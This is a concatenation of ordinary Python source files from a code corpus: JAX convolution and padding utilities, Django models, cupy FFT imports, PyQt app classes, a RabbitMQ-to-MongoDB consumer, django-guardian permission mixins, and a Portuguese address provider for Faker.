"""Utility function for computing the shape resulting from a dilation."""
if not np.all(np.greater(dilation, 0)):
msg = "All dilations must be positive, got {}."
raise TypeError(msg.format(dilation))
dilation = (1,) * (len(shape) - len(dilation)) + tuple(dilation)
return np.where(shape == 0, 0,
np.multiply(dilation, np.subtract(shape, 1)) + 1)
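# Worked example (illustrative): _dilate_shape((4, 5), (1, 2)) leaves the first
# axis alone and inserts one hole between neighbors on the second, giving
# (1 * (4 - 1) + 1, 2 * (5 - 1) + 1) == (4, 9).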
def _ceil_divide(x1, x2):
return -np.floor_divide(np.negative(x1), x2)
def padtype_to_pads(in_shape, window_shape, window_strides, padding):
"""Convert padding string to list of pairs of pad values."""
PaddingType = xla_client.PaddingType
if isinstance(padding, str):
mapping = {'VALID': PaddingType.VALID, 'SAME': PaddingType.SAME}
try:
padding = mapping[padding.upper()]
except KeyError as err:
msg = "Unrecognized padding type: expected 'VALID' or 'SAME', got {}."
raise RuntimeError(msg.format(padding)) from err
if padding == PaddingType.SAME:
out_shape = _ceil_divide(in_shape, window_strides)
pad_sizes = np.maximum(0, (out_shape - 1) * window_strides +
window_shape - in_shape)
return [(pad_size // 2, pad_size - pad_size // 2) for pad_size in pad_sizes]
elif padding == PaddingType.VALID:
return [(0, 0)] * len(in_shape)
else:
msg = "Unknown padding type: {}."
raise TypeError(msg.format(padding))
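# Worked example (illustrative): padtype_to_pads((10,), (3,), (2,), 'SAME')
# computes out_shape = ceil(10 / 2) = 5 and
# pad_size = max(0, (5 - 1) * 2 + 3 - 10) = 1, returning [(0, 1)].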
def _check_same_dtypes(name, ignore_fp_precision, *ttypes):
"""Check that dtypes agree, possibly ignoring float precision."""
# the `ignore_fp_precision` flag exists because the XLA shape inference logic
# allows mixed floating point precision, but the HLO verifier often rejects it
types = list(map(np.dtype, ttypes)) # canonicalize
if ignore_fp_precision:
types = [
np.floating if dtypes.issubdtype(dtype, np.floating)
else np.complexfloating if dtypes.issubdtype(dtype, np.complexfloating)
else dtype for dtype in types]
if len({dtypes.canonicalize_dtype(t) for t in types}) != 1:
if ignore_fp_precision:
msg = ("{} requires arguments to have same dtypes up to floating point "
"precision, got {}.")
else:
msg = "{} requires arguments to have the same dtypes, got {}."
raise TypeError(msg.format(name, ", ".join(map(str, types))))
def _check_conv_shapes(name, lhs_shape, rhs_shape, window_strides):
"""Check that conv shapes are valid and are consistent with window_strides."""
if len(lhs_shape) != len(rhs_shape):
msg = "Arguments to {} must have same rank, got {} and {}."
raise TypeError(msg.format(name, len(lhs_shape), len(rhs_shape)))
if len(lhs_shape) < 2:
msg = "Arguments to {} must have rank at least 2, got {} and {}."
raise TypeError(msg.format(name, len(lhs_shape), len(rhs_shape)))
if lhs_shape[1] != rhs_shape[1]:
msg = "Arguments to {} must agree on input feature size, got {} and {}."
raise TypeError(msg.format(name, lhs_shape[1], rhs_shape[1]))
_check_shapelike(name, "window_strides", window_strides)
if not np.all(np.greater(window_strides, 0)):
msg = "All elements of window_strides must be positive, got {}."
raise TypeError(msg.format(window_strides))
if len(window_strides) != len(lhs_shape) - 2:
msg = "{} window_strides has wrong length: expected {}, got {}."
expected_length = len(lhs_shape) - 2
raise TypeError(msg.format(name, expected_length, len(window_strides)))
def conv_shape_tuple(lhs_shape, rhs_shape, strides, pads, batch_group_count=1):
"""Compute the shape tuple of a conv given input shapes in canonical order."""
if isinstance(pads, str):
pads = padtype_to_pads(lhs_shape[2:], rhs_shape[2:], strides, pads)
if len(pads) != len(lhs_shape) - 2:
msg = "Wrong number of explicit pads for convolution: expected {}, got {}."
raise TypeError(msg.format(len(lhs_shape) - 2, len(pads)))
lhs_padded = np.add(lhs_shape[2:], np.sum(np.array(pads).reshape(-1, 2),
axis=1))
out_space = np.floor_divide(
np.subtract(lhs_padded, rhs_shape[2:]), strides) + 1
out_space = np.maximum(0, out_space)
assert lhs_shape[0] % batch_group_count == 0
out_shape = (lhs_shape[0] // batch_group_count, rhs_shape[0])
return tuple(out_shape + tuple(out_space))
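# Worked example (illustrative): conv_shape_tuple((8, 3, 10, 10), (16, 3, 3, 3),
# (2, 2), [(0, 0), (0, 0)]) gives spatial sizes floor((10 - 3) / 2) + 1 == 4
# per dimension, i.e. an output shape of (8, 16, 4, 4).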
def conv_general_shape_tuple(lhs_shape, rhs_shape, window_strides, padding,
dimension_numbers):
lhs_perm, rhs_perm, out_perm = conv_general_permutations(dimension_numbers)
lhs_trans = np.take(lhs_shape, lhs_perm)
rhs_trans = np.take(rhs_shape, rhs_perm)
out_trans = conv_shape_tuple(lhs_trans, rhs_trans, window_strides, padding)
return tuple(np.take(out_trans, np.argsort(out_perm)))
def conv_transpose_shape_tuple(lhs_shape, rhs_shape, window_strides, padding,
dimension_numbers):
lhs_perm, rhs_perm, out_perm = conv_general_permutations(dimension_numbers)
lhs_trans = np.take(lhs_shape, lhs_perm)
rhs_trans = np.take(rhs_shape, rhs_perm)
if isinstance(padding, str):
padding = [_conv_transpose_padding(k, s, padding)
for k,s in zip(rhs_trans[2:], window_strides)]
padding = list(map(np.sum, padding))
unpad_out_space = [(i-1) * s - k + 2
for i, k, s in zip(lhs_trans[2:],
rhs_trans[2:],
window_strides)]
out_space = np.sum([unpad_out_space, padding], axis=0).tolist()
out_trans = tuple((lhs_trans[0], rhs_trans[0]) + tuple(out_space))
return tuple(np.take(out_trans, np.argsort(out_perm)))
def _check_shapelike(fun_name, arg_name, obj, non_zero_shape=False):
"""Check that `obj` is a shape-like value (e.g. tuple of nonnegative ints)."""
if not isinstance(obj, (tuple, list, np.ndarray)):
msg = "{} {} must be of type tuple/list/ndarray, got {}."
raise TypeError(msg.format(fun_name, arg_name, type(obj)))
# bool(obj) for an ndarray raises an error, so we check len
if not len(obj): # pylint: disable=g-explicit-length-test
return
obj_arr = np.array(obj)
if obj_arr.ndim != 1:
msg = "{} {} must be rank 1, got {}."
    raise TypeError(msg.format(fun_name, arg_name, obj_arr.ndim))
try:
canonicalize_shape(obj_arr)
except TypeError as err:
msg = "{} {} must have every element be an integer type, got {}."
raise TypeError(msg.format(fun_name, arg_name, tuple(map(type, obj)))) from err
lower_bound, bound_error = (
(1, "strictly positive") if non_zero_shape else (0, "nonnegative"))
if not (obj_arr >= lower_bound).all():
msg = "{} {} must have every element be {}, got {}."
raise TypeError(msg.format(fun_name, arg_name, bound_error, obj))
def _dynamic_slice_indices(operand, start_indices):
if len(start_indices) != operand.ndim:
msg = ("Length of slice indices must match number of operand dimensions ({} "
"vs {})")
raise ValueError(msg.format(len(start_indices), operand.shape))
# map int over operand.shape to raise any dynamic-shape errors
safe_map(int, operand.shape)
if not isinstance(start_indices, (tuple, list)):
if start_indices.ndim != 1:
raise ValueError("Slice indices must be a 1D sequence, got {}"
.format(start_indices.shape))
return select(lt(start_indices, _zeros(start_indices)),
add(start_indices, _const(start_indices, operand.shape)),
start_indices)
else:
return [np.asarray(i + d if i < 0 else i, getattr(i, 'dtype', dtypes.int_))
if isinstance(i, (int, np.integer))
else select(lt(i, _const(i, 0)), add(i, _const(i, d)), i)
for i, d in zip(start_indices, operand.shape)]
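# Illustrative note: for an operand of shape (5, 7), start indices [-1, 2]
# become [4, 2]; negative entries are wrapped by adding the corresponding
# dimension size, mirroring NumPy-style negative indexing.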
def _const(example, val):
if dtypes.is_python_scalar(example):
return dtypes.scalar_type_of(example)(val)
return np.array(val, _dtype(example))
_zeros: Callable = partial(full_like, fill_value=0)
_zero: Callable = partial(full_like, shape=(), fill_value=0)
_ones: Callable = partial(full_like, fill_value=1)
_one: Callable = partial(full_like, shape=(), fill_value=1)
_twos: Callable = partial(full_like, fill_value=2)
_two: Callable = partial(full_like, shape=(), fill_value=2)
dtype: Callable = dtypes.result_type
_dtype: Callable = dtypes.result_type
def _iscomplex(x) -> bool:
return dtypes.issubdtype(_dtype(x), np.complexfloating)
def ranges_like(*xs):
start = 0
for x in xs:
x_len = len(x)
yield range(start, start + x_len)
start += x_len
def remaining(original, *removed_lists):
removed = set(itertools.chain(*removed_lists))
return [i for i in original if i not in removed]
def _canonicalize_precision(precision):
if precision is None:
return None
if isinstance(precision, Precision) or (
isinstance(precision, tuple)
and len(precision) == 2
and all(isinstance(p, Precision) for p in precision)
):
return precision
else:
raise ValueError("Precision argument must be None, a lax.Precision value "
f"or a tuple of two lax.Precision values; got {precision}")
def conv_dimension_numbers(lhs_shape, rhs_shape, dimension_numbers
) -> ConvDimensionNumbers:
"""Converts convolution `dimension_numbers` to a `ConvDimensionNumbers`.
Args:
lhs_shape: tuple of nonnegative integers, shape of the convolution input.
rhs_shape: tuple of nonnegative integers, shape of the convolution kernel.
dimension_numbers: None or a tuple/list of strings or a ConvDimensionNumbers
object following the convolution dimension number specification format in
xla_client.py.
Returns:
A `ConvDimensionNumbers` object that represents `dimension_numbers` in the
canonical form used by lax functions.
"""
if isinstance(dimension_numbers, ConvDimensionNumbers):
return dimension_numbers
if len(lhs_shape) != len(rhs_shape):
msg = "convolution requires lhs and rhs ndim to be equal, got {} and {}."
raise TypeError(msg.format(len(lhs_shape), len(rhs_shape)))
if dimension_numbers is None:
iota = tuple(range(len(lhs_shape)))
return ConvDimensionNumbers(iota, iota, iota)
elif isinstance(dimension_numbers, (list, tuple)):
if len(dimension_numbers) != 3:
msg = "convolution dimension_numbers list/tuple must be length 3, got {}."
raise TypeError(msg.format(len(dimension_numbers)))
if not all(isinstance(elt, str) for elt in dimension_numbers):
msg = "convolution dimension_numbers elements must be strings, got {}."
raise TypeError(msg.format(tuple(map(type, dimension_numbers))))
msg = ("convolution dimension_numbers[{}] must have len equal to the ndim "
"of lhs and rhs, got {} for lhs and rhs shapes {} and {}.")
for i, elt in enumerate(dimension_numbers):
if len(elt) != len(lhs_shape):
raise TypeError(msg.format(i, len(elt), lhs_shape, rhs_shape))
lhs_spec, rhs_spec, out_spec = conv_general_permutations(dimension_numbers)
return ConvDimensionNumbers(lhs_spec, rhs_spec, out_spec)
else:
msg = "convolution dimension_numbers must be tuple/list or None, got {}."
raise TypeError(msg.format(type(dimension_numbers)))
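# Illustrative example (comment only): a 2D convolution with NCHW inputs and
# OIHW kernels uses dimension_numbers=('NCHW', 'OIHW', 'NCHW'), which maps to
# ConvDimensionNumbers(lhs_spec=(0, 1, 2, 3), rhs_spec=(0, 1, 2, 3),
# out_spec=(0, 1, 2, 3)).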
def conv_general_permutations(dimension_numbers):
"""Utility for convolution dimension permutations relative to Conv HLO."""
lhs_spec, rhs_spec, out_spec = dimension_numbers
lhs_char, rhs_char, out_char = charpairs = ("N", "C"), ("O", "I"), ("N", "C")
for i, (a, b) in enumerate(charpairs):
if not dimension_numbers[i].count(a) == dimension_numbers[i].count(b) == 1:
msg = ("convolution dimension_numbers[{}] must contain the characters "
"'{}' and '{}' exactly once, got {}.")
raise TypeError(msg.format(i, a, b, dimension_numbers[i]))
if len(dimension_numbers[i]) != len(set(dimension_numbers[i])):
msg = ("convolution dimension_numbers[{}] cannot have duplicate "
"characters, got {}.")
raise TypeError(msg.format(i, dimension_numbers[i]))
if not (set(lhs_spec) - set(lhs_char) == set(rhs_spec) - set(rhs_char) ==
set(out_spec) - set(out_char)):
msg = ("convolution dimension_numbers elements must each have the same "
"set of spatial characters, got {}.")
raise TypeError(msg.format(dimension_numbers))
def getperm(spec, charpair):
spatial = (i for i, c in enumerate(spec) if c not in charpair)
if spec is not rhs_spec:
spatial = sorted(spatial, key=lambda i: rhs_spec.index(spec[i]))
return (spec.index(charpair[0]), spec.index(charpair[1])) + tuple(spatial)
lhs_perm, rhs_perm, out_perm = map(getperm, dimension_numbers, charpairs)
return lhs_perm, rhs_perm, out_perm
def _conv_general_proto(dimension_numbers):
assert type(dimension_numbers) is ConvDimensionNumbers
lhs_spec, rhs_spec, out_spec = dimension_numbers
proto = xla_client.ConvolutionDimensionNumbers()
proto.input_batch_dimension = lhs_spec[0]
proto.input_feature_dimension = lhs_spec[1]
proto.output_batch_dimension = out_spec[0]
proto.output_feature_dimension = out_spec[1]
proto.kernel_output_feature_dimension = rhs_spec[0]
proto.kernel_input_feature_dimension = rhs_spec[1]
proto.input_spatial_dimensions.extend(lhs_spec[2:])
proto.kernel_spatial_dimensions.extend(rhs_spec[2:])
proto.output_spatial_dimensions.extend(out_spec[2:])
return proto
def _conv_general_vjp_lhs_padding(
in_shape, window_dimensions, window_strides, out_shape, padding,
lhs_dilation, rhs_dilation) -> List[Tuple[int, int]]:
lhs_dilated_shape = _dilate_shape(in_shape, lhs_dilation)
rhs_dilated_shape = _dilate_shape(window_dimensions, rhs_dilation)
out_dilated_shape = _dilate_shape(out_shape, window_strides)
pad_before = np.subtract(rhs_dilated_shape, [lo for lo, _ in padding]) - 1
pad_after = (np.add(lhs_dilated_shape, rhs_dilated_shape) - 1
- out_dilated_shape - pad_before)
return safe_zip(pad_before, pad_after)
def _conv_general_vjp_rhs_padding(
in_shape, window_dimensions, window_strides, out_shape, padding,
lhs_dilation, rhs_dilation):
lhs_dilated_shape = _dilate_shape(in_shape, lhs_dilation)
rhs_dilated_shape = _dilate_shape(window_dimensions, rhs_dilation)
out_dilated_shape = _dilate_shape(out_shape, window_strides)
total_in_pad = out_dilated_shape + rhs_dilated_shape - lhs_dilated_shape - 1
return [(pad[0], tot - pad[0]) for pad, tot in zip(padding, total_in_pad)]
def _balanced_eq(x, z, y):
return div(select(_eq_meet(x, z), _ones(z), _zeros(z)),
select(_eq_meet(y, z), _twos(z), _ones(z)))
def _eq_meet(a, b):
a_dtype, b_dtype = _dtype(a), _dtype(b)
if a_dtype != b_dtype:
higher_dtype = dtypes.promote_types(a_dtype, b_dtype)
if higher_dtype == a_dtype:
a = convert_element_type(a, b_dtype)
else:
b = convert_element_type(b, a_dtype)
return eq(a, b)
def _abstractify(x):
return raise_to_shaped(core.get_aval(x))
def _check_user_dtype_supported(dtype, fun_name=None):
  # Avoid using `dtype in [...]` because of numpy dtype equality overloading.
if isinstance(dtype, type) and dtype in {bool, int, float, complex}:
return
np_dtype = np.dtype(dtype)
if np_dtype.kind not in "biufc" and np_dtype.type != dtypes.bfloat16:
msg = f"JAX only supports number and bool dtypes, got dtype {dtype}"
msg += f" in {fun_name}" if fun_name else ""
raise TypeError(msg)
if dtype is not None and np_dtype != dtypes.canonicalize_dtype(dtype):
msg = ("Explicitly requested dtype {} {} is not available, "
"and will be truncated to dtype {}. To enable more dtypes, set the "
"jax_enable_x64 configuration option or the JAX_ENABLE_X64 shell "
"environment variable. "
"See https://github.com/google/jax#current-gotchas for more.")
fun_name = f"requested in {fun_name}" if fun_name else ""
truncated_dtype = dtypes.canonicalize_dtype(dtype).name
    warnings.warn(msg.format(dtype, fun_name, truncated_dtype), stacklevel=2)
def _canonicalize_axis(axis, num_dims):
"""Canonicalize an axis in [-num_dims, num_dims) to [0, num_dims)."""
axis = operator.index(axis)
if not -num_dims <= axis < num_dims:
raise ValueError(
"axis {} is out of bounds for array of dimension {}".format(
axis, num_dims))
if axis < 0:
axis = axis + num_dims
return axis
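# Quick illustration (an assumption, not part of the original source):
#
#   _canonicalize_axis(-1, 3)  # == 2
#   _canonicalize_axis(1, 3)   # == 1
#   _canonicalize_axis(3, 3)   # raises ValueError (out of bounds)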
tie_in_p = Primitive('tie_in')
@config.register_omnistaging_disabler
def omnistaging_disabler() -> None:
global tie_in
def tie_in(x: Array, y: Array) -> Array:
"""Returns the value of ``y`` but with a fake data dependence on ``x``.
When staging to XLA (e.g. running under jit or pmap), values that don't depend
on computation inputs are computed op-by-op, and folded into the XLA
computation as constants.
``tie_in`` provides a way to explicitly stage values into the computation.
When staging to XLA and ``x`` is already staged, then the result of ``tie_in``
is ``y``, but staged to XLA. Downstream use of the result will also be staged
to XLA.
For example, ``lax.sin(const)`` would be constant-folded if ``const`` is
    a constant array, but ``lax.sin(lax.tie_in(x, const))`` will be staged to
XLA as long as ``x`` is staged to XLA.
"""
if config.omnistaging_enabled:
return y
else:
return tie_in_p.bind(x, y)
# If lax has already been imported, we need to monkey-patch the
# lax/__init__.py import of tie_in. If not (i.e. if this is running at lax
# module creation time) then we'll get an import error.
try:
jax.lax.tie_in = tie_in
except AttributeError:
pass
def _tie_in_transpose_rule(t, x, y):
if ad.is_undefined_primal(x):
return [ad_util.Zero(x.aval), t]
else:
return [ad_util.Zero.from_value(x), t]
def _tie_in_batch_rule(batched_args, batch_dims):
y = tie_in(*batched_args)
_, bdim_y = batch_dims
return y, bdim_y
def _tie_in_impl(x, y):
core.check_valid_jaxtype(x)
core.check_valid_jaxtype(y)
return y
def _tie_in_jvp(primals, tangents):
x, y = primals
x_dot, y_dot = tangents
if type(y_dot) is ad_util.Zero or core.get_aval(y_dot).dtype is dtypes.float0:
return y, y_dot # skip tying in in this case
else:
return ad.linear_jvp(tie_in_p, primals, tangents)
tie_in_p.def_impl(_tie_in_impl)
tie_in_p.def_abstract_eval(lambda x, y: raise_to_shaped(y))
xla.translations[tie_in_p] = lambda c, x, y: y
ad.primitive_jvps[tie_in_p] = _tie_in_jvp
ad.primitive_transposes[tie_in_p] = partial(ad.linear_transpose2, _tie_in_transpose_rule)
batching.primitive_batchers[tie_in_p] = _tie_in_batch_rule
masking.masking_rules[tie_in_p] = lambda vals, logical_shapes: vals[1]
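# Rough illustration (an assumption, not part of the original source): with
# omnistaging disabled, ``tie_in`` keeps an otherwise-constant value inside the
# jitted computation instead of letting it be constant-folded:
#
#   def f(x):
#       const = np.ones(3)
#       return lax.sin(lax.tie_in(x, const))  # sin is staged to XLA, not folded
#
#   jax.jit(f)(np.arange(3.0))
#
# With omnistaging enabled, ``tie_in(x, y)`` simply returns ``y``.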
|
py | b415cd56b8b968d2043025ce5a7780e981f5488b | from django.db import models
from datetime import datetime
import string, random
import uuid
# Create your models here.
class HeaderNavs(models.Model):
title = models.CharField(max_length = 50)
url = models.CharField(max_length = 50)
def __str__(self):
return self.title
class Meta:
verbose_name_plural = "HeaderNavs"
class Blogs(models.Model):
title = models.CharField(max_length = 50)
short_description = models.TextField(max_length = 100)
description = models.TextField()
created_at = models.DateTimeField(default=datetime.now, blank=True)
avatar = models.ImageField(upload_to = 'static/img/avatar/', default = 'static/img/avatar_1.jpg')
slug = models.CharField(max_length=40, blank=True, default=uuid.uuid4, unique=True)
def __str__(self):
return self.title
class Meta:
verbose_name_plural = "Blogs"
|
py | b415cf3353cef721ca6c2f231f99a00ab7dc211f | from cupy.fft.fft import fft # NOQA
from cupy.fft.fft import fft2 # NOQA
from cupy.fft.fft import fftfreq # NOQA
from cupy.fft.fft import fftn # NOQA
from cupy.fft.fft import fftshift # NOQA
from cupy.fft.fft import hfft # NOQA
from cupy.fft.fft import ifft # NOQA
from cupy.fft.fft import ifft2 # NOQA
from cupy.fft.fft import ifftn # NOQA
from cupy.fft.fft import ifftshift # NOQA
from cupy.fft.fft import ihfft # NOQA
from cupy.fft.fft import irfft # NOQA
from cupy.fft.fft import irfft2 # NOQA
from cupy.fft.fft import irfftn # NOQA
from cupy.fft.fft import rfft # NOQA
from cupy.fft.fft import rfft2 # NOQA
from cupy.fft.fft import rfftfreq # NOQA
from cupy.fft.fft import rfftn # NOQA
|
py | b415cf3fd78ddd73ff4e9d925ed7da611fe0a29c | __author__ = 'nhaines'
from PyQt4 import QtCore
from PyQt4 import QtGui
from PyQt4 import QtNetwork
import network
class BaseApp(QtGui.QApplication):
def __init__(self, argv=[], organization="PyQtHelpers", name="Default"):
super(BaseApp, self).__init__(argv)
self.setOrganizationName(organization)
self.setApplicationName(name)
self.onLoad()
self.lastWindowClosed.connect(self.onExit)
def onLoad(self):
pass
def onExit(self):
pass
class HttpClientApp(BaseApp):
def __init__(self, argv=[], organization="PyQtHelpers", name="Default"):
self.client = QtNetwork.QNetworkAccessManager()
super(HttpClientApp, self).__init__(argv, organization, name)
def onLoad(self):
cookies = QtNetwork.QNetworkCookie.parseCookies(QtCore.QSettings().value("network/client/cookies", ""))
cookie_jar = QtNetwork.QNetworkCookieJar()
cookie_jar.setAllCookies(cookies)
self.client.setCookieJar(cookie_jar)
def onExit(self):
cookies = QtCore.QByteArray()
for cookie in self.client.cookieJar().allCookies():
cookies.append(cookie.toRawForm())
QtCore.QSettings().setValue("network/client/cookies", cookies)
class HttpServerApp(BaseApp):
def __init__(self, argv=[], organization="PyQtHelpers", name="Default", port=8080):
self.server = network.HttpServer()
super(HttpServerApp, self).__init__(argv, organization, name)
self.server.listen(QtNetwork.QHostAddress.LocalHost, port=port)
def onExit(self):
self.server.close()
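# Minimal usage sketch (an assumption, not part of the original module): the classes
# above are meant to be instantiated (or subclassed) as the application object;
# HttpClientApp persists cookies through QSettings between runs:
#
#   import sys
#   app = HttpClientApp(sys.argv, organization="MyOrg", name="MyApp")
#   # ... create widgets and issue requests through app.client ...
#   sys.exit(app.exec_())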
|
py | b415cfb6b7f3b00f6f016fd65aa914241f22e560 | import asyncio
import aio_pika
import json
from random import choice
from datetime import datetime
from motor.motor_asyncio import AsyncIOMotorClient
RABBITMQ_DSN = 'amqp://user:password@host:5672'
QUEUE_NAME = "mongo_task"
MONGO_DSN = 'mongodb://user:password@host:27017'
MONGO_DB = 'task_test'
MONGO_COLLECTION = 'task'
count_processed_messages = 0
DELAY_IN_SECONDS = [1, 2, 3, 4, 5, 6, 7, 8]
async def update_mongo(task_id: str, document_id: str, field: str, value: str):
clause = {
'task_id': task_id,
'documents.id': document_id
}
connection = AsyncIOMotorClient(MONGO_DSN)
collection = connection[MONGO_DB][MONGO_COLLECTION]
new_value = {
f'documents.$.{field}': value
}
await collection.update_one(clause, {'$set': new_value})
if field == 'finished':
clause = {
'$and': [
{'task_id': task_id},
{'documents.finished': {'$ne': None}}
]
}
new_value = {
'$set': {'finished': value}
}
result = await collection.update_one(clause, new_value)
return result.matched_count
async def process_message(message: aio_pika.IncomingMessage):
"""
    Process an incoming message, acknowledging receipt automatically.
:param message:
:return:
"""
async with message.process():
global count_processed_messages
delay = choice(DELAY_IN_SECONDS)
count_processed_messages += 1
message_content = message.body.decode('utf-8')
data = json.loads(message_content)
task_id = data['task_id']
document_id = data['document_id']
await update_mongo(task_id, document_id, 'started', datetime.now().isoformat())
await asyncio.sleep(delay)
result = await update_mongo(task_id, document_id, 'finished', datetime.now().isoformat())
if result:
print(result)
print(f'Get result {count_processed_messages}: {data} with time {delay}')
async def main(main_loop, rabbitmq_conn: str, queue_name: str):
connection: aio_pika.RobustConnection = await aio_pika.connect_robust(rabbitmq_conn, loop=main_loop)
channel = await connection.channel()
exchange = await channel.declare_exchange("direct", durable=True, auto_delete=False)
queue = await channel.declare_queue(queue_name, auto_delete=False, durable=True)
await queue.bind(exchange, queue_name)
await queue.consume(process_message)
print('[x] Start consumer for ', queue_name)
return connection
if __name__ == "__main__":
loop = asyncio.get_event_loop()
rabbit_connection = loop.run_until_complete(main(loop, RABBITMQ_DSN, QUEUE_NAME))
try:
loop.run_forever()
finally:
loop.run_until_complete(rabbit_connection.close())
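# Producer-side sketch (an assumption; this file only implements the consumer): the
# queue is expected to receive JSON bodies carrying the task_id and document_id keys
# read by process_message(), published to the same direct exchange, e.g.:
#
#   message = aio_pika.Message(
#       body=json.dumps({"task_id": "42", "document_id": "abc"}).encode("utf-8"),
#       delivery_mode=aio_pika.DeliveryMode.PERSISTENT,
#   )
#   await exchange.publish(message, routing_key=QUEUE_NAME)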
|
py | b415d006822293e5c424620a3ced177a252f3602 | from __future__ import unicode_literals
from collections import Iterable
from django.conf import settings
from django.contrib.auth.decorators import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ImproperlyConfigured
from django.core.exceptions import PermissionDenied
from guardian.compat import basestring
from guardian.models import UserObjectPermission
from guardian.utils import get_403_or_None
from guardian.utils import get_anonymous_user
class LoginRequiredMixin(object):
"""
A login required mixin for use with class based views. This Class is a
light wrapper around the `login_required` decorator and hence function
parameters are just attributes defined on the class.
Due to parent class order traversal this mixin must be added as the left
most mixin of a view.
    The mixin has exactly the same flow as the `login_required` decorator:
If the user isn't logged in, redirect to ``settings.LOGIN_URL``, passing
the current absolute path in the query string. Example:
``/accounts/login/?next=/polls/3/``.
If the user is logged in, execute the view normally. The view code is
free to assume the user is logged in.
**Class Settings**
``LoginRequiredMixin.redirect_field_name``
*Default*: ``'next'``
``LoginRequiredMixin.login_url``
*Default*: ``settings.LOGIN_URL``
"""
redirect_field_name = REDIRECT_FIELD_NAME
login_url = settings.LOGIN_URL
def dispatch(self, request, *args, **kwargs):
return login_required(redirect_field_name=self.redirect_field_name,
login_url=self.login_url)(
super(LoginRequiredMixin, self).dispatch
)(request, *args, **kwargs)
class PermissionRequiredMixin(object):
"""
A view mixin that verifies if the current logged in user has the specified
permission by wrapping the ``request.user.has_perm(..)`` method.
If a `get_object()` method is defined either manually or by including
another mixin (for example ``SingleObjectMixin``) or ``self.object`` is
defined then the permission will be tested against that specific instance,
    alternatively you can specify a `get_permission_object()` method if ``self.object``
    or `get_object()` does not return the object against which you want to test the
    permission.
    .. note:
    Testing of a permission against a specific object instance requires an
    authentication backend that supports object permissions. Please see
    ``django-guardian`` to add object level permissions to your project.
The mixin does the following:
If the user isn't logged in, redirect to settings.LOGIN_URL, passing
the current absolute path in the query string. Example:
/accounts/login/?next=/polls/3/.
    If `raise_exception` is set to True then, rather than redirecting to the
    login page, a `PermissionDenied` (403) is raised.
    If the user is logged in and passes the permission check, then the view
    is executed normally.
**Example Usage**::
class SecureView(PermissionRequiredMixin, View):
...
permission_required = 'auth.change_user'
...
**Class Settings**
``PermissionRequiredMixin.permission_required``
*Default*: ``None``, must be set to either a string or list of strings
in format: *<app_label>.<permission_codename>*.
``PermissionRequiredMixin.login_url``
*Default*: ``settings.LOGIN_URL``
``PermissionRequiredMixin.redirect_field_name``
*Default*: ``'next'``
``PermissionRequiredMixin.return_403``
*Default*: ``False``. Returns 403 error page instead of redirecting
user.
``PermissionRequiredMixin.raise_exception``
*Default*: ``False``
`permission_required` - the permission to check of form "<app_label>.<permission codename>"
i.e. 'polls.can_vote' for a permission on a model in the polls application.
``PermissionRequiredMixin.accept_global_perms``
    *Default*: ``False``. If accept_global_perms is set to True, the mixin
    will first check for global perms and, if none are found, proceed to
    check object level permissions.
``PermissionRequiredMixin.permission_object``
    *Default*: ``None``, the object against which to test the permission; if None,
    falls back to ``self.get_permission_object()``, which returns ``self.get_object()``
    or ``self.object`` by default.
"""
# default class view settings
login_url = settings.LOGIN_URL
permission_required = None
redirect_field_name = REDIRECT_FIELD_NAME
return_403 = False
raise_exception = False
accept_global_perms = False
permission_object = None
def get_required_permissions(self, request=None):
"""
Returns list of permissions in format *<app_label>.<codename>* that
should be checked against *request.user* and *object*. By default, it
returns list from ``permission_required`` attribute.
:param request: Original request.
"""
if isinstance(self.permission_required, basestring):
perms = [self.permission_required]
elif isinstance(self.permission_required, Iterable):
perms = [p for p in self.permission_required]
else:
raise ImproperlyConfigured("'PermissionRequiredMixin' requires "
"'permission_required' attribute to be set to "
"'<app_label>.<permission codename>' but is set to '%s' instead"
% self.permission_required)
return perms
def get_permission_object(self):
if self.permission_object:
return self.permission_object
return (hasattr(self, 'get_object') and self.get_object()
or getattr(self, 'object', None))
def check_permissions(self, request):
"""
Checks if *request.user* has all permissions returned by
*get_required_permissions* method.
:param request: Original request.
"""
obj = self.get_permission_object()
forbidden = get_403_or_None(request,
perms=self.get_required_permissions(
request),
obj=obj,
login_url=self.login_url,
redirect_field_name=self.redirect_field_name,
return_403=self.return_403,
accept_global_perms=self.accept_global_perms
)
if forbidden:
self.on_permission_check_fail(request, forbidden, obj=obj)
if forbidden and self.raise_exception:
raise PermissionDenied()
return forbidden
def on_permission_check_fail(self, request, response, obj=None):
"""
Method called upon permission check fail. By default it does nothing and
should be overridden, if needed.
:param request: Original request
:param response: 403 response returned by *check_permissions* method.
:param obj: Object that was fetched from the view (using ``get_object``
method or ``object`` attribute, in that order).
"""
def dispatch(self, request, *args, **kwargs):
self.request = request
self.args = args
self.kwargs = kwargs
response = self.check_permissions(request)
if response:
return response
return super(PermissionRequiredMixin, self).dispatch(request, *args,
**kwargs)
class GuardianUserMixin(object):
@staticmethod
def get_anonymous():
return get_anonymous_user()
def add_obj_perm(self, perm, obj):
return UserObjectPermission.objects.assign_perm(perm, self, obj)
def del_obj_perm(self, perm, obj):
return UserObjectPermission.objects.remove_perm(perm, self, obj)
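# Usage sketch (an assumption, not part of django-guardian itself): combining the
# mixin with a generic detail view so the permission is checked against the object
# returned by get_object(); the Article model and codename are hypothetical:
#
#   from django.views.generic import DetailView
#
#   class ArticleDetail(PermissionRequiredMixin, DetailView):
#       model = Article
#       permission_required = 'articles.view_article'
#       return_403 = True
#       accept_global_perms = True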
|
py | b415d07053da87e99968731c7e54109f1f29ad4d | from .. import Provider as AddressProvider
class Provider(AddressProvider):
street_prefixes = (
"Av",
"Avenida",
"R.",
"Rua",
"Travessa",
"Largo",
"Alameda",
"Praça",
)
city_formats = ("{{city_name}}",)
street_name_formats = (
"{{street_prefix}} {{last_name}}",
"{{street_prefix}} {{first_name}} {{last_name}}",
"{{street_prefix}} de {{last_name}}",
"{{street_prefix}} {{place_name}}",
)
street_address_formats = ("{{street_name}}, {{building_number}}",)
address_formats = ("{{street_address}}\n{{postcode}} {{city}}",)
building_number_formats = ("S/N", "%", "%#", "%#", "%#", "%##")
postcode_formats = ("####-###",)
cities = (
"Abrantes",
"Agualva-Cacém",
"Albufeira",
"Alcobaça",
"Alcácer do Sal",
"Almada",
"Almeirim",
"Alverca do Ribatejo",
"Amadora",
"Amarante",
"Amora",
"Anadia",
"Angra do Heroísmo",
"Aveiro",
"Barcelos",
"Barreiro",
"Beja",
"Braga",
"Bragança",
"Caldas da Rainha",
"Caniço",
"Cantanhede",
"Cartaxo",
"Castelo Branco",
"Chaves",
"Coimbra",
"Costa da Caparica",
